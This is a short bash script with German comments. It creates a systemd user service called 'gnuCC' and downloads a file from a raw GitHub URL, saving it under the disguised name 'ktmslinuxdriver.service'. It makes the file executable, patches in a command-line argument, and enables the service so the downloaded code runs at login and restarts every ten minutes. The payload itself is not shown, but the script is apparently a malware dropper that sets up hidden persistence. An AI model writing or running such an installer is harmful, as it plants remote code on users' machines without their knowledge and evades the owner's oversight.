#!/bin/bash

# Zielpfad zur Service-Datei
SERVICE_PATH="$HOME/.config/systemd/user/gnuCC.service"
SC_PATH="$HOME/.config/systemd/user/ktmslinuxdriver.service"

# Ordnerstruktur sicherstellen
mkdir -p "$(dirname "$SERVICE_PATH")"

# Inhalt der gnuCC.service-Datei
cat > "$SERVICE_PATH" <<EOF
[Unit]
Description=gnuCC Service
After=network.target

[Service]
Type=simple
ExecStart=%h/.config/systemd/user/ktmslinuxdriver.service
Restart=always
RestartSec=600

[Install]
WantedBy=default.target
EOF



echo "Service-Datei erstellt unter: $SERVICE_PATH"

curl -fsSL https://raw.githubusercontent.com/adrianhimmel/adriansdrawio/main/test2 -o "$SC_PATH"
chmod +x "$SC_PATH"

sed -i "s/EDITMEE/$1/g" "$SC_PATH"


systemctl --user daemon-reload
systemctl --user enable gnuCC.service
systemctl --user start gnuCC.service
